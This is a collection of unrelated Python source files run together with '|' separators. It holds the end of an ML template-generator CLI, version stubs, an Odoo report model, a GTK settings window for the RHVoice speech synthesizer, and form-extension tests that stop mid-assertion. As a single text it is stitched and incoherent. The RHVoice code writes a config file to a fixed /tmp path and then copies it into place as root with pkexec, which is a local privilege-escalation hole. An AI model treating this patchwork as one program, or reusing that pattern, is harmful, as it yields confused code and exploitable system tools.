    Fixes over the original: the duplicated ann/keras branch is gone,
    the cnn/keras branch now strips the '.mlm' extension like every
    other branch, and the lstm tensorflow backend is spelled
    'tensorflow2.0' consistently (it was 'tensorflow 2.0' and therefore
    unreachable).
    """
    def write_template(template_path):
        """Copy a bundled .mlm template into the project's .mlm file."""
        filepath = pkg_resources.resource_filename(__name__, template_path)
        # safe_load avoids the deprecated Loader-less yaml.load; the
        # templates ship with the package, so this is a drop-in change.
        with open(filepath) as template_file:
            yamlfile = yaml.safe_load(template_file)
        myFile = readfile()
        # store the project name without the .mlm extension
        yamlfile['file'] = myFile.split('.')[0]
        yamlfile['type'] = args.type
        with open(myFile, 'w') as outfile:
            yaml.dump(yamlfile, outfile, default_flow_style=False,
                      sort_keys=False)
    if args.info:
        print(
            """
MMMMMMMM               MMMMMMMLLLLLLLLLLL                  GGGGGGGGGGGGG
M:::::::M             M:::::::L:::::::::L               GGG::::::::::::G
M::::::::M           M::::::::L:::::::::L             GG:::::::::::::::G
M:::::::::M         M:::::::::LL:::::::LL            G:::::GGGGGGGG::::G
M::::::::::M       M::::::::::M L:::::L             G:::::G       GGGGGG eeeeeeeeeeee   nnnn  nnnnnnnn
M:::::::::::M     M:::::::::::M L:::::L            G:::::G             ee::::::::::::ee n:::nn::::::::nn
M:::::::M::::M   M::::M:::::::M L:::::L            G:::::G            e::::::eeeee:::::en::::::::::::::nn
M::::::M M::::M M::::M M::::::M L:::::L            G:::::G    GGGGGGGGGe::::::e     e:::::nn:::::::::::::::n
M::::::M  M::::M::::M  M::::::M L:::::L            G:::::G    G::::::::e:::::::eeeee::::::e n:::::nnnn:::::n
M::::::M   M:::::::M   M::::::M L:::::L            G:::::G    GGGGG::::e:::::::::::::::::e  n::::n    n::::n
M::::::M    M:::::M    M::::::M L:::::L            G:::::G        G::::e::::::eeeeeeeeeee   n::::n    n::::n
M::::::M     MMMMM     M::::::M L:::::L      LLLLLG:::::G         G::::e:::::::e            n::::n    n::::n
M::::::M               M::::::LL:::::::LLLLLLLLL:::::LG:::::GGGGGGGG::::e::::::::e          n::::n    n::::n
M::::::M               M::::::L::::::::::::::::::::::L GG:::::::::::::::Ge::::::::eeeeeeee  n::::n    n::::n
M::::::M               M::::::L::::::::::::::::::::::L   GGG::::::GGG:::G ee:::::::::::::e  n::::n    n::::n
MMMMMMMM               MMMMMMMLLLLLLLLLLLLLLLLLLLLLLLL      GGGGGG   GGGG   eeeeeeeeeeeeee  nnnnnn    nnnnnn
            """
        )
        print("Generate ML files in python and jupyter with this tool\n")
        #print("Learn more: https://mlgen.com")
        print("Contribute: https://github.com/NebutechOpenSource/MLGen")
        #print("Learn more about Nebutech: https://nebutech.in\n")
        print(
            """
 /$$   /$$                     /$$ /$$   /$$                     /$$       /$$
| $$  | $$                    | $$| $$  | $$                    | $$      |__/
| $$  | $$ /$$$$$$  /$$$$$$  /$$$$$$  /$$ /$$   | $$  | $$ /$$$$$$  /$$$$$$| $$ /$$/$$/$$$$$$$  /$$$$$$
| $$$$$$$$|____  $$/$$__  $$/$$__  $| $$ | $$   | $$$$$$$$|____  $$/$$_____| $$  /$$| $| $$__  $$/$$__  $$
| $$__  $$ /$$$$$$| $$  \ $| $$  \ $| $$ | $$   | $$__  $$ /$$$$$$| $$     | $$$$$$/| $| $$  \ $| $$  \ $$
| $$  | $$/$$__  $| $$  | $| $$  | $| $$ | $$   | $$  | $$/$$__  $| $$     | $$_  $$| $| $$  | $| $$  | $$
| $$  | $| $$$$$$| $$$$$$$| $$$$$$$| $$$$$$$    | $$  | $| $$$$$$| $$$$$$| $$ \  $| $| $$  | $| $$$$$$$
|__/  |__/\_______| $$____/| $$____/ \____  $$   |__/  |__/\_______/\_______|__/  \__|__|__/  |__/\____  $$
                  | $$     | $$      /$$  | $$                                                    /$$  \ $$
                  | $$     | $$     |  $$$$$$/                                                   |  $$$$$$/
                  |__/     |__/      \______/                                                     \______/
            """
        )
    if args.init is not None:
        print("args", args.init)
        createfile(args.init)
        print("init files")
    if args.run:
        print("running files")
        par = code_generate()
        par.generatefiles()
    if args.gen:
        # One bundled template per (network type, backend) pair replaces
        # six near-identical copy-pasted branches.
        templates = {
            ('cnn', 'tensorflow2.0'): '/mlm_templates/cnn_tensorflow2.mlm',
            ('cnn', 'keras'): '/mlm_templates/cnn_keras.mlm',
            ('ann', 'tensorflow2.0'): '/mlm_templates/ann_tensorflow2.mlm',
            ('ann', 'keras'): '/mlm_templates/ann_keras.mlm',
            ('lstm', 'tensorflow2.0'): '/mlm_templates/lstm_tensorflow2.mlm',
            ('lstm', 'keras'): '/mlm_templates/lstm_keras.mlm',
        }
        template = templates.get((args.gen, args.backend))
        if template is not None:
            label = 'tf' if args.backend == 'tensorflow2.0' else 'keras'
            print("generating %s files" % label)
            write_template(template)
    return ""
# Entry point when the module is executed as a script.
if __name__ == '__main__':
    main()
|
# Set the version number for the current release of the XSTOOLs user scripts.
VERSION = '6.0.9'
|
from __future__ import unicode_literals
VERSION = '0.1'
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
class ReceiptCashCheck(models.AbstractModel):
    """Report model for the 'receipt_check_cash_payment' QWeb report.

    Odoo resolves ``report.<report_name>`` AbstractModels to supply the
    rendering values for the matching report action.
    """
    _name = 'report.raqmi_cheque.receipt_check_cash_payment'
    @api.model
    def _get_report_values(self, docids, data=None):
        """Build the rendering context for the QWeb template.

        :param docids: ids of the ``normal.payments`` records to print
        :param data: optional extra data forwarded by the report action
        :return: dict consumed by the QWeb template
        """
        report_obj = self.env['ir.actions.report']
        # NOTE(review): ``report`` is never used below — this lookup looks
        # like leftover code; confirm before removing.
        report = report_obj._get_report_from_name('raqmi_cheque.receipt_check_cash_payment')
        docargs = {
            'doc_ids': docids,
            'doc_model': 'normal.payments',
            'docs': self.env['normal.payments'].browse(docids),
            # _payment_info / _convert are not defined in this class —
            # presumably provided by a mixin or inheritance; verify.
            'payment_info': self._payment_info,
            'convert': self._convert
        }
        return docargs
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
GUI для настройки rhvoice.
"""
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gio
import configparser
import os
from os.path import exists as path_exists
from os.path import expanduser
from shlex import quote
from rhvoice_tools import rhvoice_say
class MainWindow(Gtk.Window):
    """
    Main settings window.

    Two notebook tabs: per-user rhvoice_say settings and (when found)
    the system-wide RHVoice.conf options.
    """
    def __init__(self):
        Gtk.Window.__init__(self, title="Настройки RHVoice")
        self.connect("delete-event", self.exit_app)
        # per-user settings (~/.config/rhvoice_say.conf)
        self.config = Config()
        # system-wide settings (RHVoice.conf)
        self.global_config = RHVoiceConfig()
        self.notebook = Gtk.Notebook()
        self.notebook.set_vexpand(True)
        self.box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.box.add(self.notebook)
        self.add(self.box)
        bottom_panel, self.test_btn, self.apply_btn = self.build_bottom_panel()
        self.box.add(bottom_panel)
        index = self.notebook.append_page(self.build_rhvoice_say_page(),
                                          Gtk.Label(label='rhvoice_say'))
        # only show the RHVoice.conf tab when a config file was parsed
        if len(self.global_config.options.dict):
            self.gl_opts_grid = self.build_rhvoice_conf_page()
            self.notebook.append_page(self.gl_opts_grid,
                                      Gtk.Label(label='RHVoice.conf'))
        self.read_say_conf()
        self.show_all()
        self.notebook.set_current_page(index)
    def build_bottom_panel(self):
        """
        Bottom panel with the 'Test' and 'Apply' buttons.

        Returns the panel widget and the two buttons.
        """
        bottom_panel = Gtk.Box(hexpand=True)
        test_btn = Gtk.Button(label='Тест', margin=5)
        test_btn.connect('clicked', self.run_test)
        test_btn.set_halign(Gtk.Align.START)
        bottom_panel.pack_start(test_btn, True, True, 5)
        apply_btn = Gtk.Button(label='Применить', margin=5)
        apply_btn.set_halign(Gtk.Align.END)
        bottom_panel.pack_start(apply_btn, True, True, 5)
        apply_btn.connect('clicked', self.apply)
        return bottom_panel, test_btn, apply_btn
    def build_rhvoice_say_page(self):
        """
        Build the tab with the rhvoice_say settings.
        """
        conf_page_say = Gtk.Grid()
        conf_page_say.set_column_spacing(10)
        conf_page_say.set_row_spacing(5)
        conf_page_say.set_border_width(10)
        page_label = Gtk.Label(label='Настройки rhvoice_say')
        page_label.set_hexpand(True)
        page_label.set_margin_bottom(10)
        row = 0
        conf_page_say.attach(page_label, 0, row, 3, 1)
        # use Speech Dispatcher toggle
        row += 1
        use_spd_label = Gtk.Label(
            label='Использовать Speech Dispatcher:')
        use_spd_label.set_halign(Gtk.Align.START)
        conf_page_say.attach(use_spd_label, 0, row, 1, 1)
        self.use_spd_sw = Gtk.Switch()
        self.use_spd_sw.set_halign(Gtk.Align.END)
        conf_page_say.attach(self.use_spd_sw, 1, row, 1, 1)
        # volume slider (-100..100)
        row += 1
        item_label = Gtk.Label(label='Громкость:')
        item_label.set_halign(Gtk.Align.START)
        conf_page_say.attach(item_label, 0, row, 1, 1)
        self.volume_scale = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,
                                                     -100, 100, 1)
        self.volume_scale.set_size_request(100, -1)
        conf_page_say.attach(self.volume_scale, 1, row, 2, 1)
        # rate slider (-100..100)
        row += 1
        item_label = Gtk.Label(label='Скорость:')
        item_label.set_halign(Gtk.Align.START)
        conf_page_say.attach(item_label, 0, row, 1, 1)
        self.rate_scale = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,
                                                   -100, 100, 1)
        conf_page_say.attach(self.rate_scale, 1, row, 2, 1)
        # pitch slider (-100..100)
        row += 1
        item_label = Gtk.Label(label='Высота:')
        item_label.set_halign(Gtk.Align.START)
        conf_page_say.attach(item_label, 0, row, 1, 1)
        self.pitch_scale = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,
                                                    -100, 100, 1)
        conf_page_say.attach(self.pitch_scale, 1, row, 2, 1)
        # voice selector
        row += 1
        item_label = Gtk.Label(label='Голос:')
        item_label.set_halign(Gtk.Align.START)
        conf_page_say.attach(item_label, 0, row, 1, 1)
        self.combo_voice = Gtk.ComboBoxText()
        conf_page_say.attach(self.combo_voice, 1, row, 2, 1)
        # stress-marker toggle plus the single-character entry
        row += 1
        item_label = Gtk.Label(label='Символ ударения:')
        item_label.set_halign(Gtk.Align.START)
        conf_page_say.attach(item_label, 0, row, 1, 1)
        self.use_stress_sw = Gtk.Switch()
        self.use_stress_sw.set_halign(Gtk.Align.END)
        conf_page_say.attach(self.use_stress_sw, 1, row, 1, 1)
        self.entry_stress = Gtk.Entry(xalign=0.5)
        self.entry_stress.set_max_length(1)
        conf_page_say.attach(self.entry_stress, 2, row, 1, 1)
        self.use_stress_sw.set_tooltip_text(
            'Включите для дополнительной обработки с использованием символа '
            'ударения.\n'
            '(cимвол должен совпадать с указанным в настройках rhvoice)')
        self.entry_stress.set_tooltip_text(
            'Cимвол должен совпадать с указанным в настройках rhvoice')
        self.use_stress_sw.connect('state-set', self.stress_changed)
        return conf_page_say
    def build_rhvoice_conf_page(self, conf_page=None):
        """
        Build (or rebuild) the tab with the global RHVoice.conf options.

        :param conf_page: existing Gtk.Grid to refill, or None for a new one
        """
        if conf_page is None:
            conf_page = Gtk.Grid()
        conf_page.set_column_spacing(10)
        conf_page.set_row_spacing(5)
        conf_page.set_border_width(10)
        page_label = Gtk.Label(label='Настройки из файла RHVoice.conf')
        page_label.set_hexpand(True)
        page_label.set_margin_bottom(10)
        row = 0
        conf_page.attach(page_label, 0, row, 3, 1)
        for option_name, option in self.global_config.options.dict.items():
            if not option.enabled:
                # skip inactive (commented-out) options
                continue
            # option name / description label
            row += 1
            if option.description:
                lbl = option.description
            else:
                lbl = option.name
            item_label = Gtk.Label(label=lbl)
            item_label.set_halign(Gtk.Align.START)
            conf_page.attach(item_label, 0, row, 1, 1)
            # widget for the option value, picked by its kind
            if option.kind in ('text', 'char'):
                entry = Gtk.Entry(xalign=0.5)
                if option.kind == 'char':
                    entry.set_max_length(1)
                entry.set_text(option.value)
                entry.set_tooltip_text(option.tooltip)
                entry.connect('changed', self.entry_changed, option)
                conf_page.attach(entry, 1, row, 1, 1)
            elif option.kind == 'list':
                combo = Gtk.ComboBoxText()
                for i, value in enumerate(('min', 'standard', 'max')):
                    combo.append(str(i), value)
                    if value == option.value:
                        combo.set_active(i)
                combo.set_tooltip_text(option.tooltip)
                combo.connect('changed', self.combo_changed, option)
                conf_page.attach(combo, 1, row, 1, 1)
            elif option.kind == 'bool':
                switch = Gtk.Switch()
                switch.set_halign(Gtk.Align.END)
                switch.set_active(option.value)
                switch.set_tooltip_text(option.tooltip)
                switch.connect('state-set', self.switch_changed, option)
                conf_page.attach(switch, 1, row, 1, 1)
            else:
                # read-only display for unknown kinds
                item_label = Gtk.Label(label=option.value)
                item_label.set_tooltip_text(option.tooltip)
                item_label.set_halign(Gtk.Align.CENTER)
                conf_page.attach(item_label, 1, row, 1, 1)
        row += 1
        open_editor = Gtk.Button(label='Открыть в редакторе', margin=10)
        open_editor.set_tooltip_text('Для изменения файла настроек '
                                     'требуются права root.')
        open_editor.set_halign(Gtk.Align.CENTER)
        open_editor.connect("clicked", self.open_editor)
        conf_page.attach(open_editor, 0, row, 3, 1)
        conf_page.show_all()
        return conf_page
    def open_editor(self, widget=None):
        """
        Open the config file in an editor, then refresh the window data.
        """
        self.global_config.open_editor()
        self.update_data()
    def update_data(self):
        """
        Refresh the RHVoice.conf tab from the (possibly edited) file.
        """
        self.global_config.update()
        self.gl_opts_grid.foreach(self.gl_opts_grid.remove)
        self.build_rhvoice_conf_page(self.gl_opts_grid)
    def read_say_conf(self):
        """
        Load the rhvoice_say settings from file into the widgets.
        """
        self.use_spd_sw.set_active(self.config.use_SD)
        self.volume_scale.set_value(self.config.volume)
        self.rate_scale.set_value(self.config.rate)
        self.pitch_scale.set_value(self.config.pitch)
        # fill the combobox and select the current voice in it
        self.combo_voice.remove_all()
        for i, voice in enumerate(self.config.voices):
            self.combo_voice.append(str(i), voice)
            if voice == self.config.voice:
                self.combo_voice.set_active(i)
        # stress_marker is either False or a one-character string
        self.stress_marker = self.config.stress_marker
        if self.stress_marker == False:
            self.use_stress_sw.set_active(False)
            self.entry_stress.set_text('')
            self.entry_stress.set_sensitive(False)
        else:
            self.use_stress_sw.set_active(True)
            self.entry_stress.set_text(self.stress_marker)
            self.entry_stress.set_sensitive(True)
    def entry_changed(self, entry, option):
        """
        User edited a text/char option.
        """
        option.value = entry.get_text()
    def combo_changed(self, combo, option):
        """
        User picked another value from a list option.
        """
        option.value = combo.get_active_text()
    def switch_changed(self, switch, state, option):
        """
        User toggled a boolean option.
        """
        option.value = switch.get_active()
    def stress_changed(self, widget, state):
        """
        Handle the 'stress marker' switch: enable/disable its entry.
        """
        self.entry_stress.set_sensitive(state)
    def apply(self, widget=None):
        """
        Apply the settings of whichever tab is currently open.
        """
        if self.notebook.get_current_page() == 0:
            self.apply_say_conf()
        else:
            self.global_config.write_conf()
            self.update_data()
    def apply_say_conf(self):
        """
        Write the rhvoice_say widget values back to the config file.
        """
        self.config.use_SD = self.use_spd_sw.get_active()
        self.config.volume = self.volume_scale.get_value()
        self.config.rate = self.rate_scale.get_value()
        self.config.pitch = self.pitch_scale.get_value()
        self.config.voice = self.combo_voice.get_active_text()
        if self.use_stress_sw.get_active() and self.entry_stress.get_text():
            self.config.stress_marker = self.entry_stress.get_text()
        else:
            self.config.stress_marker = False
        self.config.write_conf()
        self.read_say_conf()
    def run_test(self, widget=None):
        """
        Speak a test message with the current settings.
        """
        rhvoice_say('Проверка настройки синтезатора rhvoice')
    def exit_app(self, widget, event):
        """
        Quit the application.
        """
        Gtk.main_quit()
class Config():
    """
    Read and write the per-user rhvoice_say settings
    (~/.config/rhvoice_say.conf).
    """
    def __init__(self):
        # configuration file location
        self.file_name = expanduser("~") + '/.config/rhvoice_say.conf'
        self.config = configparser.ConfigParser(allow_no_value=True)
        # keep option names case-sensitive
        self.config.optionxform = str
        self.voices = self.get_voices()
        if self.voices is None:
            # fallback list when installed voices cannot be detected
            self.voices = ['Aleksandr', 'Aleksandr+Alan', 'Anna', 'Arina',
                           'Artemiy', 'Elena', 'Elena+Clb', 'Irina', 'Pavel',
                           'Victoria']
        self.voices.sort()
        # defaults, overridden by read_conf() below
        self.use_SD = False
        self.voice = 'Aleksandr+Alan'
        self.volume = 0
        self.rate = 0
        self.pitch = 0
        self.stress_marker = False
        self.read_conf()
    def get_voices(self):
        """
        Find the installed Russian voices.

        Returns a list of voice names, or None when none are found.
        """
        voices_dir = '/usr/share/RHVoice/voices'
        if not path_exists(voices_dir):
            return None
        all_voices = os.listdir(voices_dir)
        voices_list = []
        # NOTE(review): the same ConfigParser is reused for every voice, so
        # values read from one voice.info may persist into the next when a
        # key is absent there — confirm; a fresh parser per file would be
        # safer.
        voice_config = configparser.ConfigParser()
        for voice in all_voices:
            voice_info = os.path.join(voices_dir, voice, 'voice.info')
            if not path_exists(voice_info):
                continue
            # voice.info has no section header; prepend one so that
            # configparser accepts it
            with open(voice_info, 'r') as f:
                config_string = '[root]\n' + f.read()
            voice_config.read_string(config_string)
            # keep only Russian voices
            if voice_config['root'].get('language') == 'Russian':
                voice_name = voice_config['root'].get('name')
                voices_list.append(voice_name)
        if voices_list:
            return voices_list
        else:
            return None
    def read_conf(self):
        """
        Load the settings from the config file.
        """
        # open the configuration file
        if not path_exists(self.file_name):
            # create it with defaults when missing
            self.write_conf()
        self.config.read(self.file_name)
        settings = self.config['Settings']
        self.use_SD = settings.getboolean('use_speech_dispatcher')
        self.voice = settings.get('voice')
        self.volume = settings.getint('volume')
        self.rate = settings.getint('rate')
        self.pitch = settings.getint('pitch')
        self.stress_marker = settings.get('use_stress_marker')
        # normalise: stress_marker is either False or a character
        if (self.stress_marker is None) or (self.stress_marker == 'False'):
            self.stress_marker = False
    def write_conf(self):
        """
        Write the current settings to the config file.
        """
        # keys starting with ';' are comment lines (allow_no_value=True)
        self.config['Settings'] = {
            "; Использовать Speech Dispatcher для чтения ('True' или 'False')": None,
            'use_speech_dispatcher': self.use_SD,
            '; Громкость в процентах (от -100 до 100)': None,
            'volume': int(self.volume),
            '; Скорость в процентах (от -100 до 100)': None,
            'rate': int(self.rate),
            '; Высота в процентах (от -100 до 100)': None,
            'pitch': int(self.pitch),
            '; Голос для чтения': None,
            'voice': self.voice,
            '; Использовать символ для указания ударения (False или символ)': None,
            'use_stress_marker': self.stress_marker}
        with open(self.file_name, 'w') as configfile:
            self.config.write(configfile)
class RHVoiceConfig:
    """
    System-wide RHVoice settings (RHVoice.conf).

    Parses the file into an RHVoiceOptions registry and writes edited
    values back, preserving comments and unknown lines.
    """
    def __init__(self):
        """Locate the config file and parse it."""
        self.conf_file = None
        self.options = RHVoiceOptions()
        self.find_file()
        self.parse_conf()
    def find_file(self):
        """Search the standard locations for RHVoice.conf."""
        for path in ('/etc/RHVoice/RHVoice.conf',
                     '/usr/local/etc/RHVoice/RHVoice.conf'):
            if path_exists(path):
                self.conf_file = quote(path)
                break
        # TODO: search other locations and let the user choose one
    def parse_conf(self):
        """Read every parameter found in the config file into the registry."""
        if self.conf_file is None:
            return
        try:
            f = open(self.conf_file, 'r')
        except OSError:
            # unreadable file: keep the built-in defaults
            return
        # ``with`` closes the handle; the original called ``f.close``
        # without parentheses and leaked the descriptor.
        with f:
            for line in f:
                line = line.strip()
                # skip comments and empty lines
                if line.startswith(';') or len(line) == 0:
                    continue
                # collapse repeated whitespace
                line = " ".join(line.split())
                option = line.split('=')
                if len(option) == 2:
                    option_rec = self.options.dict.get(option[0])
                    if option_rec is not None:
                        # update a known (built-in) option
                        if option_rec.kind == 'bool':
                            option_rec.value = self.str_to_bool(option[1])
                        else:
                            option_rec.value = option[1]
                        option_rec.enabled = True
                    else:
                        # register a user-defined option
                        self.options.dict[option[0]] = ConfigOption(
                            name=option[0], value=option[1], enabled=True)
    def str_to_bool(self, value):
        """Interpret an RHVoice.conf boolean literal."""
        return value in ('true', 'yes', 'on', '1')
    def bool_to_str(self, value):
        """Serialize a boolean back to RHVoice.conf form."""
        return 'true' if value else 'false'
    def open_editor(self, widget=None):
        """Open the config file in an editor (escalating to root if needed)."""
        if self.conf_file is None:
            return
        if os.access(self.conf_file, os.W_OK):
            os.system("xdg-open " + self.conf_file)
        else:
            # find the user's preferred editor for this mime type
            mime_type = Gio.content_type_guess(self.conf_file)
            app_infos = Gio.app_info_get_all_for_type(mime_type[0])
            if len(app_infos) > 0:
                app_bin = app_infos[0].get_executable()
                # run the editor as root, preserving the X session vars
                env = 'DISPLAY=$DISPLAY XAUTHORITY=$XAUTHORITY'
                os.system("pkexec env %s %s %s"
                          % (env, quote(app_bin), self.conf_file))
    def write_conf(self):
        """Write the edited option values back to the config file."""
        if self.conf_file is None:
            return
        try:
            f = open(self.conf_file, 'r')
        except OSError:
            return
        content = ''
        last_line = ''  # to collapse runs of blank lines
        with f:
            for line in f:
                line = line.strip()
                # keep comments / blank lines (but not repeated blanks)
                if line.startswith(';') or len(line) == 0:
                    if line != last_line:
                        content += line + '\n'
                    last_line = line
                    continue
                line = " ".join(line.split())
                option = line.split('=')
                if len(option) == 2:
                    opt_rec = self.options.get(option[0])
                    if opt_rec is not None:
                        # replace with the (possibly edited) current value
                        if opt_rec.kind == 'bool':
                            content += (opt_rec.name + '=' +
                                        self.bool_to_str(opt_rec.value) + '\n')
                        else:
                            content += opt_rec.name + '=' + opt_rec.value + '\n'
                    else:
                        content += line + '\n'
                else:
                    content += line + '\n'
                last_line = line
        # Stage the new content from Python instead of shelling out with
        # ``echo`` (fragile quoting), then copy it into place as root.
        with open('/tmp/rhvoice_conf_tmp', 'w') as tmp:
            tmp.write(content)
        os.system("pkexec cp /tmp/rhvoice_conf_tmp %s" % self.conf_file)
    def update(self):
        """Reload the option registry from the (possibly edited) file."""
        self.options.clear()
        self.parse_conf()
class ConfigOption():
    """
    A single RHVoice configuration option: its value plus the UI
    metadata (description, tooltip, widget kind, limits, ...).
    """
    def __init__(self, name, value,
                 default=None, description='', tooltip='', kind='any',
                 limits=(None, None), values_list=(), enabled=False):
        # ``values_list`` previously defaulted to a mutable ``[]`` shared
        # between all instances; an immutable tuple avoids that pitfall.
        self.name = name                # option key in the config file
        self.value = value              # current value
        self.description = description  # short human-readable label
        self.tooltip = tooltip          # longer explanation for the UI
        # widget kind: 'float', 'text', 'list', 'char', 'bool', 'any'
        self.kind = kind
        self.default = default          # default value
        self.limits = limits            # (min, max) constraints
        self.values_list = values_list  # allowed values for 'list' kind
        self.enabled = enabled          # present (uncommented) in the file
class RHVoiceOptions():
    """
    Registry of the known RHVoice.conf options, keyed by option name.
    """
    def __init__(self):
        self.dict = {}
        self.clear()
    def clear(self):
        """
        Reset the registry to the built-in option definitions.
        """
        builtin = (
            ConfigOption(
                name='quality',
                value='standard',
                description='Качество речи',
                tooltip='Доступные значения:\n'
                        'min (максимальное быстродействие),\n'
                        'standard (стандартное качество),\n'
                        'max (максимальное возможное качество, но с задержками '
                        'при синтезе длинных предложений).',
                kind='list',
                values_list=('min', 'standard', 'max'),
                default='standard'),
            ConfigOption(
                name='stress_marker',
                value='',
                description='Символ ударения',
                tooltip='Символ, который в тексте будет указывать, что на '
                        'непосредственно следующую за ним гласную падает '
                        'ударение (только русский текст).',
                kind='char'),
            ConfigOption(
                name='languages.Russian.use_pseudo_english',
                value=False,
                description='Псевдо-английский для русских голосов',
                tooltip='Включить поддержку псевдо-английского для русских '
                        'голосов.',
                kind='bool',
                default=False),
            ConfigOption(
                name='voice_profiles',
                value='Aleksandr+Alan,Elena+CLB',
                description='Список голосовых профилей',
                tooltip='Первым в профиле указывается основной голос '
                        '(он будет читать числа и другой текст, для которого '
                        'не удаётся автоматически определить язык). '
                        'Далее следуют дополнительные голоса. '
                        'Если в профиле заданы два голоса, чьи языки имеют '
                        'общие буквы, то второй будет использоваться только в '
                        'том случае, когда программа экранного доступа '
                        'специально запросит использование данного языка.',
                kind='text',
                default='Aleksandr+Alan,Elena+CLB'),
        )
        self.dict.clear()
        for opt in builtin:
            self.dict[opt.name] = opt
    def get(self, option):
        """
        Return the option named *option*, or None when it is unknown
        or has never been defined.
        """
        return self.dict.get(option)
def main():
    """
    Create the settings window and hand control to the GTK main loop.
    """
    window = MainWindow()  # keep a reference for the lifetime of the loop
    Gtk.main()
# Launch the GUI when executed as a script.
if __name__ == '__main__':
    main()
|
from onegov.core.utils import Bunch
from onegov.form import Form
from onegov.form.extensions import Extendable
from onegov.org.models import (
PersonLinkExtension, ContactExtension, AccessExtension, HoneyPotExtension
)
from uuid import UUID
def test_disable_extension():
    """An extension listed in app.settings disabled_extensions injects no field."""
    class Topic(AccessExtension):
        meta = {}
    class TopicForm(Form):
        pass
    # enabled by default -> 'access' field is injected
    topic = Topic()
    request = Bunch(**{'app.settings.org.disabled_extensions': []})
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    assert 'access' in form._fields
    # disabled via settings -> field is absent
    topic = Topic()
    request = Bunch(**{
        'app.settings.org.disabled_extensions': ['AccessExtension']
    })
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    assert 'access' not in form._fields
def test_access_extension():
    """The 'access' field round-trips between the form and the model."""
    class Topic(AccessExtension):
        meta = {}
    class TopicForm(Form):
        pass
    topic = Topic()
    assert topic.access == 'public'
    request = Bunch(**{'app.settings.org.disabled_extensions': []})
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    assert 'access' in form._fields
    assert form.access.data == 'public'
    # form -> model
    form.access.data = 'private'
    form.populate_obj(topic)
    assert topic.access == 'private'
    # model -> form
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    form.process(obj=topic)
    assert form.access.data == 'private'
    form.access.data = 'member'
    form.populate_obj(topic)
    assert topic.access == 'member'
def test_person_link_extension():
    """Per-person checkbox/function fields are injected and round-trip."""
    class Topic(PersonLinkExtension):
        content = {}
        def get_selectable_people(self, request):
            return [
                Bunch(
                    id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
                    title='Troy Barnes'
                ),
                Bunch(
                    id=UUID('adad98ff-74e2-497a-9e1d-fbba0a6bbe96'),
                    title='Abed Nadir'
                )
            ]
    class TopicForm(Form):
        pass
    topic = Topic()
    assert topic.people is None
    request = Bunch(**{
        'translate': lambda text: text,
        'app.settings.org.disabled_extensions': []
    })
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    # one checkbox plus one function text field per selectable person,
    # named after the person's hex uuid
    assert 'people_6d120102d90344868eb32614cf3acb1a' in form._fields
    assert 'people_6d120102d90344868eb32614cf3acb1a_function' in form._fields
    assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96' in form._fields
    assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96_function' in form._fields
    # selecting a person stores (function, is_visible) under content
    form.people_6d120102d90344868eb32614cf3acb1a.data = True
    form.update_model(topic)
    assert topic.content['people'] == [
        ('6d120102d90344868eb32614cf3acb1a', (None, False))
    ]
    form.people_6d120102d90344868eb32614cf3acb1a_function.data \
        = 'The Truest Repairman'
    form.update_model(topic)
    assert topic.content['people'] == [
        ('6d120102d90344868eb32614cf3acb1a', ('The Truest Repairman', False))
    ]
    # model -> form
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    form.apply_model(topic)
    assert form.people_6d120102d90344868eb32614cf3acb1a.data is True
    assert form.people_6d120102d90344868eb32614cf3acb1a_function.data \
        == 'The Truest Repairman'
    assert form.people_6d120102d90344868eb32614cf3acb1a_is_visible_function\
        .data == False
    assert not form.people_adad98ff74e2497a9e1dfbba0a6bbe96.data
    assert not form.people_adad98ff74e2497a9e1dfbba0a6bbe96_function.data
def test_person_link_extension_duplicate_name():
    """Two people sharing the same title still get distinct fields (by uuid)."""
    class Topic(PersonLinkExtension):
        content = {}
        def get_selectable_people(self, request):
            return [
                Bunch(
                    id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
                    title='Foo'
                ),
                Bunch(
                    id=UUID('adad98ff-74e2-497a-9e1d-fbba0a6bbe96'),
                    title='Foo'
                )
            ]
    class TopicForm(Form):
        pass
    topic = Topic()
    assert topic.people is None
    request = Bunch(**{
        'translate': lambda text: text,
        'app.settings.org.disabled_extensions': []
    })
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    assert 'people_6d120102d90344868eb32614cf3acb1a' in form._fields
    assert 'people_6d120102d90344868eb32614cf3acb1a_function' in form._fields
    assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96' in form._fields
    assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96_function' in form._fields
def test_person_link_extension_order():
    """People sort by last name until manually moved; then new ones append."""
    class Topic(PersonLinkExtension):
        content = {}
        def get_selectable_people(self, request):
            return [
                Bunch(
                    id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
                    title='Troy Barnes'
                ),
                Bunch(
                    id=UUID('aa37e9cc-40ab-402e-a70b-0d2b4d672de3'),
                    title='Annie Edison'
                ),
                Bunch(
                    id=UUID('adad98ff-74e2-497a-9e1d-fbba0a6bbe96'),
                    title='Abed Nadir'
                ),
                Bunch(
                    id=UUID('f0281b55-8a5f43f6-ac81-589d79538a87'),
                    title='Britta Perry'
                )
            ]
    class TopicForm(Form):
        pass
    request = Bunch(**{
        'translate': lambda text: text,
        'app.settings.org.disabled_extensions': []
    })
    topic = Topic()
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    form.people_6d120102d90344868eb32614cf3acb1a.data = True
    form.people_f0281b558a5f43f6ac81589d79538a87.data = True
    form.update_model(topic)
    # the people are kept sorted by lastname, firstname by default
    assert topic.content['people'] == [
